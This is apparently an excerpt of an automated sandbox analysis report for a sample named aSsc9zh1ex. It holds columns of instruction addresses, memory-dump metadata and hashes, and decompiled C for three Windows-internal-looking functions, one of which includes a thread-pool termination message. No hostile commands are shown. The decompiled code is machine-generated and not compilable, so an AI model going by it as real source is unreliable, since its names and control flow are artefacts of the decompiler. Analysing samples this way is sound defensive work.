                                                                                                                              0x1d747956
                                                                                                                              0x1d74795e
                                                                                                                              0x1d7a17bb
                                                                                                                              0x1d7a17c3
                                                                                                                              0x1d7a17c3
                                                                                                                              0x1d747968
                                                                                                                              0x1d747969
                                                                                                                              0x1d74796f
                                                                                                                              0x1d747970
                                                                                                                              0x1d747973
                                                                                                                              0x00000000
                                                                                                                              0x1d74788a
                                                                                                                              0x1d74788a
                                                                                                                              0x1d747894
                                                                                                                              0x1d747894
                                                                                                                              0x1d747899
                                                                                                                              0x1d747899
                                                                                                                              0x1d74789e
                                                                                                                              0x1d7478a2
                                                                                                                              0x1d7478a7
                                                                                                                              0x1d7478ad
                                                                                                                              0x1d7478b9
                                                                                                                              0x1d7478bd
                                                                                                                              0x1d7478bd
                                                                                                                              0x1d7478bf
                                                                                                                              0x1d7478c5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7479ca
                                                                                                                              0x1d7479ca
                                                                                                                              0x1d7478cb
                                                                                                                              0x1d7478cb
                                                                                                                              0x1d7478d0
                                                                                                                              0x1d7478d2
                                                                                                                              0x1d7478d9
                                                                                                                              0x1d7478dd
                                                                                                                              0x1d7478e2
                                                                                                                              0x1d7478e2
                                                                                                                              0x1d7478ee
                                                                                                                              0x1d7478f3
                                                                                                                              0x1d7478f9
                                                                                                                              0x1d7478fd
                                                                                                                              0x1d747901
                                                                                                                              0x1d747917
                                                                                                                              0x1d74791b
                                                                                                                              0x1d74791d
                                                                                                                              0x1d747921
                                                                                                                              0x1d747925
                                                                                                                              0x1d747927
                                                                                                                              0x1d747929
                                                                                                                              0x1d74793b
                                                                                                                              0x1d74793d
                                                                                                                              0x1d74793f
                                                                                                                              0x1d7a179f
                                                                                                                              0x1d7a179f
                                                                                                                              0x1d7a17a1
                                                                                                                              0x1d7a17a1
                                                                                                                              0x00000000
                                                                                                                              0x1d747929
                                                                                                                              0x1d74798a
                                                                                                                              0x1d74798d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d74798f

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3f15e2626a49fe070f7db48aab0ad220ac12b9f0ef3c88b591ec28e8358474bf
                                                                                                                              • Instruction ID: 7c59c4687448c96d86606990a45d67a4f923b8057935b9bb9e8831ff1516d5b1
                                                                                                                              • Opcode Fuzzy Hash: 3f15e2626a49fe070f7db48aab0ad220ac12b9f0ef3c88b591ec28e8358474bf
                                                                                                                              • Instruction Fuzzy Hash: 26516E75A08351DFC715CF28C08092AFBF5FB88664F258A6EE59997351D730E844CB93
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7FBB40 Relevance: .2, Instructions: 162COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E1D7FBB40(signed int __ecx, void* __edx, intOrPtr _a4, short _a8) {
				char _v5;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr _t58;
				signed int _t60;
				signed int _t63;
				signed int _t65;
				char _t71;
				void* _t74;
				char _t78;
				signed int _t85;
				signed int _t86;
				char _t95;
				intOrPtr _t97;
				signed int _t102;
				signed int _t106;
				void* _t107;
				intOrPtr _t109;
				intOrPtr _t110;
				intOrPtr _t111;
				char _t112;
				void* _t114;
				void* _t117;

				_t96 = __ecx;
				_t58 = _a4;
				_t95 = 0;
				_v12 = __ecx;
				_t112 = 0;
				if(_t58 != 1) {
					if(_t58 != 3) {
						if(_t58 != 2) {
							L37:
							return 0;
						}
						_t60 = _a8;
						if(_t60 < 0) {
							goto L37;
						}
						_t97 =  *((intOrPtr*)(__ecx + 0x14));
						_t106 = _t60;
						if(_t106 >= ( *(_t97 + 6) & 0x0000ffff)) {
							goto L37;
						}
						_t63 = _t106 * 0x1c +  *((intOrPtr*)(_t97 + 0xc));
						L3:
						return _t63 & 0xffffff00 | _t117 == 0x00000000;
					}
					_t65 =  *(__edx + 6) & 0x0000ffff;
					_v16 = 0;
					if(_t65 < 0) {
						if( *(__edx + 4) == 0) {
							goto L37;
						}
						_t107 = 0x55;
						_t112 = E1D73D818(__ecx, _t107);
						if(_t112 == 0) {
							goto L37;
						}
						_v16 = _t112;
						_v20 = 0xaa0000;
						if(E1D764F40( *(__edx + 4) & 0x0000ffff,  &_v20) == 0) {
							E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t112);
							goto L37;
						}
						_t114 = _a8;
						L25:
						_t109 =  *((intOrPtr*)(_v12 + 0x18));
						if(_t109 == 0 || _t114 < 0) {
							L29:
							_t71 = _t95;
							goto L30;
						} else {
							_t102 = _t114;
							if(_t102 >= ( *(_t109 + 6) & 0x0000ffff)) {
								goto L29;
							}
							_t71 =  *((intOrPtr*)(_t109 + 0x10)) +  *( *((intOrPtr*)(_t109 + 0xc)) + _t102 * 2) * 2;
							L30:
							if(_t71 == 0) {
								L32:
								_v5 = _t95;
								L33:
								if(_t112 != 0) {
									E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t95, _t112);
								}
								return _v5;
							}
							_t74 = E1D7879A0(_v16, _t71);
							_v5 = 1;
							if(_t74 == 0) {
								goto L33;
							}
							goto L32;
						}
					}
					_t114 = _a8;
					if(_t65 != _t114) {
						_t110 =  *((intOrPtr*)(__ecx + 0x18));
						if(_t110 == 0) {
							L18:
							_t78 = _t95;
							L19:
							if(_t78 == 0) {
								goto L37;
							}
							E1D785050(_t96,  &_v20, _t78);
							goto L25;
						}
						_t96 = _t65;
						if(_t96 >= ( *(_t110 + 6) & 0x0000ffff)) {
							goto L18;
						}
						_t78 =  *((intOrPtr*)(_t110 + 0x10)) + _t96 * 2;
						goto L19;
					}
					return 1;
				}
				_t85 =  *(__edx + 4) & 0x0000ffff;
				if(_t85 == 0) {
					_t86 =  *(__edx + 6) & 0x0000ffff;
					if(_t86 < 0) {
						goto L37;
					}
					_t111 =  *((intOrPtr*)(__ecx + 0x18));
					if(_t111 != 0) {
						_t96 = _t86;
						if(_t96 < ( *(_t111 + 6) & 0x0000ffff)) {
							_t95 =  *((intOrPtr*)(_t111 + 0x10)) + _t96 * 2;
						}
					}
					if(_t95 == 0) {
						goto L37;
					} else {
						E1D785050(_t96,  &_v20, _t95);
						if(E1D7656E0( &_v20,  &_v12) == 0) {
							goto L37;
						}
						_t63 = _v12;
						goto L3;
					}
				}
				_t63 = _a8;
				_t117 = _t85 - _t63;
				goto L3;
			}



























                                                                                                                              0x1d7fbb40
                                                                                                                              0x1d7fbb48
                                                                                                                              0x1d7fbb4d
                                                                                                                              0x1d7fbb4f
                                                                                                                              0x1d7fbb55
                                                                                                                              0x1d7fbb59
                                                                                                                              0x1d7fbbd3
                                                                                                                              0x1d7fbce2
                                                                                                                              0x1d7fbcd7
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbcd7
                                                                                                                              0x1d7fbce4
                                                                                                                              0x1d7fbceb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbced
                                                                                                                              0x1d7fbcf0
                                                                                                                              0x1d7fbcf9
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbcfe
                                                                                                                              0x1d7fbb6c
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbb6c
                                                                                                                              0x1d7fbbd9
                                                                                                                              0x1d7fbbdd
                                                                                                                              0x1d7fbbe3
                                                                                                                              0x1d7fbc30
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc38
                                                                                                                              0x1d7fbc3e
                                                                                                                              0x1d7fbc42
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc51
                                                                                                                              0x1d7fbc54
                                                                                                                              0x1d7fbc62
                                                                                                                              0x1d7fbcd2
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbcd2
                                                                                                                              0x1d7fbc64
                                                                                                                              0x1d7fbc68
                                                                                                                              0x1d7fbc6b
                                                                                                                              0x1d7fbc70
                                                                                                                              0x1d7fbc91
                                                                                                                              0x1d7fbc91
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc77
                                                                                                                              0x1d7fbc7b
                                                                                                                              0x1d7fbc80
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc8c
                                                                                                                              0x1d7fbc93
                                                                                                                              0x1d7fbc95
                                                                                                                              0x1d7fbcaa
                                                                                                                              0x1d7fbcaa
                                                                                                                              0x1d7fbcad
                                                                                                                              0x1d7fbcaf
                                                                                                                              0x1d7fbcbd
                                                                                                                              0x1d7fbcbd
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbcc2
                                                                                                                              0x1d7fbc9b
                                                                                                                              0x1d7fbca0
                                                                                                                              0x1d7fbca8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbca8
                                                                                                                              0x1d7fbc70
                                                                                                                              0x1d7fbbe5
                                                                                                                              0x1d7fbbec
                                                                                                                              0x1d7fbbf5
                                                                                                                              0x1d7fbbfa
                                                                                                                              0x1d7fbc16
                                                                                                                              0x1d7fbc16
                                                                                                                              0x1d7fbc18
                                                                                                                              0x1d7fbc1a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc25
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc25
                                                                                                                              0x1d7fbbfc
                                                                                                                              0x1d7fbc05
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc11
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbc11
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbbee
                                                                                                                              0x1d7fbb5b
                                                                                                                              0x1d7fbb62
                                                                                                                              0x1d7fbb74
                                                                                                                              0x1d7fbb7b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbb81
                                                                                                                              0x1d7fbb86
                                                                                                                              0x1d7fbb88
                                                                                                                              0x1d7fbb91
                                                                                                                              0x1d7fbb9d
                                                                                                                              0x1d7fbb9d
                                                                                                                              0x1d7fbb91
                                                                                                                              0x1d7fbba2
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbba8
                                                                                                                              0x1d7fbbad
                                                                                                                              0x1d7fbbc1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbbc7
                                                                                                                              0x00000000
                                                                                                                              0x1d7fbbcb
                                                                                                                              0x1d7fbba2
                                                                                                                              0x1d7fbb66
                                                                                                                              0x1d7fbb6a
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fae01c3fd95582de9779016b234f99c0438632d43d7d65269239a59648bef338
                                                                                                                              • Instruction ID: f04acc6223cfc4b164546049a175363a68567a420094cf8d4533e57dffcbd66c
                                                                                                                              • Opcode Fuzzy Hash: fae01c3fd95582de9779016b234f99c0438632d43d7d65269239a59648bef338
                                                                                                                              • Instruction Fuzzy Hash: CC51F53950014A9ACB24CF65C490ABBB7BABF44B20B51805FE9B59B711EF30DD82C762
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D77B490 Relevance: .2, Instructions: 161COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 45%
                                                                                                                              			E1D77B490(void* __ecx, signed int __edx, char _a4) {
				signed int _v8;
				intOrPtr _v20;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v120;
				signed int _v124;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				void* _v148;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v168;
				signed int _v180;
				void* _v184;
				void* _v192;
				void* _v200;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t62;
				void* _t72;
				signed int _t81;
				signed int _t82;
				intOrPtr _t101;
				signed char _t102;
				signed int _t110;
				signed char _t113;
				signed int _t117;
				signed int _t121;
				intOrPtr _t122;
				void* _t125;
				char _t127;
				void* _t129;
				signed int _t134;
				signed int _t135;
				signed int _t137;
				void* _t141;

				_t124 = __edx;
				_t137 = (_t135 & 0xfffffff8) - 0xc4;
				_v8 =  *0x1d83b370 ^ _t137;
				_push(_t129);
				_t110 = 0;
				_push(0);
				_push(4);
				_push( &_v192);
				_push(0xc);
				_push(0xfffffffe);
				_v192 = 0;
				_t62 = E1D782C00();
				_t127 = _a4;
				if(_t62 < 0) {
					L2:
					E1D75F640(_t110, _t127, _t129, _t140);
					E1D77B500(_t110, _t127, _t129, _t140, _t110);
					_push(_t127);
					_push(_t110);
					E1D782EE0();
					L8:
					_t141 =  *0x1d8341d4 - _t110; // 0x0
					if(_t141 == 0) {
						L21:
						_t117 = ( *( *[fs:0x18] + 0xfca) & 0x0000ffff) >> 0x0000000c & 0x00000001;
						E1D7619DF(_t117);
						E1D762755(_t124);
						E1D74FED0(0x1d835b40);
						E1D76DAC0(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)));
						_push(_t127);
						_push(_t110);
						_t72 = E1D782C70();
						_t148 = _t72;
						if(_t72 >= 0) {
							E1D76D9CE();
							_push(0x1d835b40);
							 *0x1d835b4c =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *0x1d835b44 = 0xfffffffe;
							 *0x1d835b48 = 1;
							 *0x1d835b50 = _t110;
							E1D74E740(_t117);
							E1D76D940(_t117, 0xffffffff, _t127);
							E1D76D6D0(_t110, _t127, 0x1d835b40, _t148);
							_push(_t127);
							_push(0xffffffff);
							E1D782C70();
						}
						E1D76DA20(_t117,  *((intOrPtr*)( *[fs:0x30] + 0x18)));
						_push(0x1d835b40);
						E1D74E740(_t117);
						_push(_t117);
						_push(_t110);
						_t125 = 0x12;
						E1D76270D(_t125);
						_push(_t127);
						_push(0xfffffffe);
						E1D782EE0();
						asm("int3");
						_push(_t110);
						_push(_t110);
						_push(0x818);
						_push( &_v124);
						_push(0xffffffff);
						_push(_t127);
						_push(0xffffffff);
						if(E1D782D70() >= 0) {
							_push(_t110);
							_push(0x1c);
							_push( &_v168);
							_push(_t110);
							_push(_v124);
							_t81 = E1D782C00();
							__eflags = _t81;
							if(_t81 < 0) {
								goto L5;
							}
							_t82 =  *0x1D835B60;
							__eflags = _t82 - _v160;
							if(_t82 != _v160) {
								goto L5;
							}
							_t82 =  *0x1D835B64;
							__eflags = _t82 - _v156;
							if(_t82 == _v156) {
								__eflags =  *0x1D836AD0 - _t110;
								L4:
								_t8 = __eflags != 0;
								__eflags = _t8;
								_t110 = _t110 & 0xffffff00 | _t8;
								goto L5;
							}
							_v140 =  &_v128;
							_v132 = 4;
							_v136 = 0xf90;
							_push(_t110);
							_push(0xc);
							_push( &_v140);
							_push(0x1a);
							_push(_v124);
							_t82 = E1D782C00();
							__eflags = _t82;
							if(_t82 < 0) {
								goto L5;
							}
							__eflags = _v128 - _t110;
							goto L4;
						} else {
							_v124 = _t110;
							L5:
							if(_v124 != 0) {
								_push(_v124);
								_t82 = E1D782A80();
							}
							if(_t110 != 0) {
								E1D7CEF10(0x54, 0, "ThreadPool: attempt to terminate a worker thread via handle %p\nContact the owner of the function calling Terminate/Exit thread.\n", _t127);
								E1D788F40( &_v120, 0, 0x50);
								_v120 = 0xc000071c;
								_v104 = 1;
								_v100 = _t127;
								_v8 = 0;
								_push( &_v120);
								_t82 = E1D798A60(_t117, _t125);
								_v8 = 0xfffffffe;
							}
							 *[fs:0x0] = _v20;
							return _t82;
						}
					}
					E1D788F40(_t137 + 0x18, _t110, 0xb0);
					_t137 = _t137 + 0xc;
					 *((intOrPtr*)(_t137 + 0x18)) = 0xb0;
					 *((intOrPtr*)(_t137 + 0x44)) = 0x20000;
					_t134 = _t110;
					do {
						_t121 = _t134 & 0xffff7fff;
						 *(_t137 + 0x10) = _t121;
						if( *0x1d8341d4 == 0) {
							goto L19;
						}
						if(_t121 < 0x40) {
							L14:
							asm("lock inc dword [eax]");
							_t101 =  *0x1d8341d4; // 0x0
							_t102 =  *(_t101 + _t121 * 8);
							if((_t102 & 0x00000001) == 0) {
								_t113 = _t102;
								__eflags = 0;
								if(0 == 0) {
									_t124 =  *(_t113 + 0xd4);
									_t122 =  *((intOrPtr*)(_t113 + 0x14));
									asm("lock dec dword [eax+ecx*8+0x4]");
									__eflags = _t124 & 0x00000400;
									if((_t124 & 0x00000400) == 0) {
										_t28 = _t137 + 0x24;
										 *_t28 =  *(_t137 + 0x24) & 0x00000000;
										__eflags =  *_t28;
										_v180 = _t134;
										E1D77D883(_t122, _t137 + 0x18);
									}
								}
							} else {
								asm("lock dec dword [eax+ecx*8+0x4]");
							}
							goto L19;
						}
						_t124 = _t137 + 0x10;
						if(E1D811712(_t134, _t137 + 0x10) != 0) {
							goto L19;
						}
						_t121 =  *(_t137 + 0x10);
						goto L14;
						L19:
						_t134 = _t134 + 1;
					} while (_t134 < 0x40);
					_t110 = 0;
					goto L21;
				}
				_t140 = _v192;
				if(_v192 != 0) {
					goto L8;
				}
				goto L2;
			}











































                                                                                                                              0x1d77b490
                                                                                                                              0x1d77b498
                                                                                                                              0x1d77b4a5
                                                                                                                              0x1d77b4ad
                                                                                                                              0x1d77b4af
                                                                                                                              0x1d77b4b5
                                                                                                                              0x1d77b4b6
                                                                                                                              0x1d77b4b8
                                                                                                                              0x1d77b4b9
                                                                                                                              0x1d77b4bb
                                                                                                                              0x1d77b4bd
                                                                                                                              0x1d77b4c1
                                                                                                                              0x1d77b4c6
                                                                                                                              0x1d77b4cb
                                                                                                                              0x1d77b4d7
                                                                                                                              0x1d77b4d7
                                                                                                                              0x1d77b4dd
                                                                                                                              0x1d77b4e2
                                                                                                                              0x1d77b4e3
                                                                                                                              0x1d77b4e4
                                                                                                                              0x1d7b70fd
                                                                                                                              0x1d7b70fd
                                                                                                                              0x1d7b7103
                                                                                                                              0x1d7b71c5
                                                                                                                              0x1d7b71d5
                                                                                                                              0x1d7b71d8
                                                                                                                              0x1d7b71dd
                                                                                                                              0x1d7b71e8
                                                                                                                              0x1d7b71f6
                                                                                                                              0x1d7b71fb
                                                                                                                              0x1d7b71fc
                                                                                                                              0x1d7b71fd
                                                                                                                              0x1d7b7202
                                                                                                                              0x1d7b7204
                                                                                                                              0x1d7b7206
                                                                                                                              0x1d7b7211
                                                                                                                              0x1d7b7215
                                                                                                                              0x1d7b721a
                                                                                                                              0x1d7b7224
                                                                                                                              0x1d7b722e
                                                                                                                              0x1d7b7234
                                                                                                                              0x1d7b723c
                                                                                                                              0x1d7b7241
                                                                                                                              0x1d7b7246
                                                                                                                              0x1d7b7247
                                                                                                                              0x1d7b7249
                                                                                                                              0x1d7b7249
                                                                                                                              0x1d7b7257
                                                                                                                              0x1d7b725c
                                                                                                                              0x1d7b725d
                                                                                                                              0x1d7b7262
                                                                                                                              0x1d7b7263
                                                                                                                              0x1d7b7266
                                                                                                                              0x1d7b7267
                                                                                                                              0x1d7b726c
                                                                                                                              0x1d7b726d
                                                                                                                              0x1d7b726f
                                                                                                                              0x1d7b7274
                                                                                                                              0x1d7b7275
                                                                                                                              0x1d7b7276
                                                                                                                              0x1d7b7277
                                                                                                                              0x1d7b727f
                                                                                                                              0x1d7b7280
                                                                                                                              0x1d7b7282
                                                                                                                              0x1d7b7283
                                                                                                                              0x1d7b728c
                                                                                                                              0x1d7b7296
                                                                                                                              0x1d7b7297
                                                                                                                              0x1d7b729f
                                                                                                                              0x1d7b72a0
                                                                                                                              0x1d7b72a1
                                                                                                                              0x1d7b72a4
                                                                                                                              0x1d7b72a9
                                                                                                                              0x1d7b72ab
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b72b1
                                                                                                                              0x1d7b72b4
                                                                                                                              0x1d7b72ba
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b72c0
                                                                                                                              0x1d7b72c3
                                                                                                                              0x1d7b72c9
                                                                                                                              0x1d77b529
                                                                                                                              0x1d77b52f
                                                                                                                              0x1d77b52f
                                                                                                                              0x1d77b52f
                                                                                                                              0x1d77b52f
                                                                                                                              0x00000000
                                                                                                                              0x1d77b52f
                                                                                                                              0x1d7b72d2
                                                                                                                              0x1d7b72d8
                                                                                                                              0x1d7b72df
                                                                                                                              0x1d7b72e9
                                                                                                                              0x1d7b72ea
                                                                                                                              0x1d7b72f2
                                                                                                                              0x1d7b72f3
                                                                                                                              0x1d7b72f5
                                                                                                                              0x1d7b72f8
                                                                                                                              0x1d7b72fd
                                                                                                                              0x1d7b72ff
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b7305
                                                                                                                              0x00000000
                                                                                                                              0x1d7b728e
                                                                                                                              0x1d7b728e
                                                                                                                              0x1d77b532
                                                                                                                              0x1d77b536
                                                                                                                              0x1d7b730d
                                                                                                                              0x1d7b7310
                                                                                                                              0x1d7b7310
                                                                                                                              0x1d77b53e
                                                                                                                              0x1d7b7325
                                                                                                                              0x1d7b7331
                                                                                                                              0x1d7b7339
                                                                                                                              0x1d7b7340
                                                                                                                              0x1d7b7347
                                                                                                                              0x1d7b734a
                                                                                                                              0x1d7b7350
                                                                                                                              0x1d7b7351
                                                                                                                              0x1d7b7364
                                                                                                                              0x1d7b7364
                                                                                                                              0x1d77b547
                                                                                                                              0x1d77b553
                                                                                                                              0x1d77b553
                                                                                                                              0x1d7b728c
                                                                                                                              0x1d7b7115
                                                                                                                              0x1d7b711a
                                                                                                                              0x1d7b711d
                                                                                                                              0x1d7b7121
                                                                                                                              0x1d7b7129
                                                                                                                              0x1d7b712f
                                                                                                                              0x1d7b7131
                                                                                                                              0x1d7b713e
                                                                                                                              0x1d7b7142
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b7147
                                                                                                                              0x1d7b715c
                                                                                                                              0x1d7b7167
                                                                                                                              0x1d7b716a
                                                                                                                              0x1d7b716f
                                                                                                                              0x1d7b7174
                                                                                                                              0x1d7b7182
                                                                                                                              0x1d7b7186
                                                                                                                              0x1d7b7188
                                                                                                                              0x1d7b718a
                                                                                                                              0x1d7b7190
                                                                                                                              0x1d7b7198
                                                                                                                              0x1d7b719d
                                                                                                                              0x1d7b71a3
                                                                                                                              0x1d7b71a5
                                                                                                                              0x1d7b71a5
                                                                                                                              0x1d7b71a5
                                                                                                                              0x1d7b71b0
                                                                                                                              0x1d7b71b4
                                                                                                                              0x1d7b71b4
                                                                                                                              0x1d7b71a3
                                                                                                                              0x1d7b7176
                                                                                                                              0x1d7b717b
                                                                                                                              0x1d7b717b
                                                                                                                              0x00000000
                                                                                                                              0x1d7b7174
                                                                                                                              0x1d7b7149
                                                                                                                              0x1d7b7156
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7b7158
                                                                                                                              0x00000000
                                                                                                                              0x1d7b71b9
                                                                                                                              0x1d7b71b9
                                                                                                                              0x1d7b71ba
                                                                                                                              0x1d7b71c3
                                                                                                                              0x00000000
                                                                                                                              0x1d7b71c3
                                                                                                                              0x1d77b4cd
                                                                                                                              0x1d77b4d1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: bae027fe876e092d027f0834ac51dc0dc5f6eb0bcc38bd5776a7919d82898fe0
                                                                                                                              • Instruction ID: 49d60bfafcd46022d4366be634925de6b526e9d3a2df6abb916773655825b09f
                                                                                                                              • Opcode Fuzzy Hash: bae027fe876e092d027f0834ac51dc0dc5f6eb0bcc38bd5776a7919d82898fe0
                                                                                                                              • Instruction Fuzzy Hash: 4751C5B9108355ABD710DF69DCC4F6AB7A8EB84774F150A2EFA15472A2D730E80087B3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D737C85 Relevance: .2, Instructions: 160COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 49%
                                                                                                                              			E1D737C85(char __ecx) {
				short* _v20;
				void* _v28;
				char _v29;
				void* _v32;
				intOrPtr* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E1D74FED0(0x1d835b40);
					_t104 =  *0x1d836390; // 0x1ab2c38
					if(_t104 == 0) {
						_t49 = 0;
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x46000000
					_push(0x1d835b40);
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E1D74E740(_t93);
					if( *((char*)(_t108 + 0xf)) == 0) {
						L5:
						_t49 = _t104;
						break;
					}
					_t101 =  *0x7ffe02dc;
					if(( *(_t104 + 0x14) & 0x00000001) != 0 || 0x7ffe02dc != _v20) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0x90028);
						_push(_t108 + 0x20);
						_push(0);
						_push(0);
						_push(0);
						_t10 = _t104 + 4; // 0x0
						_push( *_t10);
						_t53 = E1D782D40();
						__eflags = _t53;
						if(_t53 >= 0) {
							__eflags =  *(_t104 + 0x14) & 0x00000001;
							if(( *(_t104 + 0x14) & 0x00000001) == 0) {
								E1D74FED0(0x1d835b40);
								_push(0x1d835b40);
								 *((intOrPtr*)(_t104 + 8)) = _t101;
								E1D74E740(0);
							}
							goto L5;
						}
						__eflags = _t53 - 0xc0000012;
						if(__eflags == 0) {
							L11:
							_t11 = _t104 + 0xe; // 0xab2c5002
							_t13 = _t104 + 0xc; // 0x1ab2c45
							_t93 = _t13;
							 *((char*)(_t108 + 0x12)) = 0;
							__eflags = E1D7741BB(_t13,  *_t11 & 0x0000ffff, __eflags, _t108 + 0x10);
							if(__eflags >= 0) {
								L14:
								_t102 =  *((intOrPtr*)(_t108 + 0x10));
								 *_t102 = 2;
								_v20 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
								E1D74FED0(0x1d835b40);
								__eflags =  *0x1d836390 - _t104; // 0x1ab2c38
								if(__eflags == 0) {
									__eflags =  *((char*)(_t108 + 0xe));
									_t95 = _v20;
									 *0x1d836390 = _t102;
									_t32 = _t102 + 0xc; // 0x0
									 *_t95 =  *_t32;
									_t33 = _t102 + 0x10; // 0x0
									 *((intOrPtr*)(_t95 + 4)) =  *_t33;
									_t35 = _t102 + 4; // 0xffffffff
									 *((intOrPtr*)(_t95 + 8)) =  *_t35;
									if(__eflags != 0) {
										_t37 = _t104 + 0x10; // 0x2001ab2c
										_t95 =  *((intOrPtr*)( *_t37));
										E1D7BD87C(_t89,  *((intOrPtr*)( *_t37)), __eflags);
									}
									_push(0x1d835b40);
									E1D74E740(_t95);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t38 = _t104 + 4; // 0x0
										_push( *_t38);
										E1D782A80();
										E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v36;
									}
									asm("lock xadd [esi], ebx");
									__eflags = _t89 == 1;
									if(_t89 == 1) {
										_t41 = _t104 + 4; // 0x0
										_push( *_t41);
										E1D782A80();
										E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 = _v36;
									}
									_t49 = _t102;
									break;
								}
								_push(0x1d835b40);
								E1D74E740(_t93);
								asm("lock xadd [esi], eax");
								if(__eflags == 0) {
									_t25 = _t104 + 4; // 0x0
									_push( *_t25);
									E1D782A80();
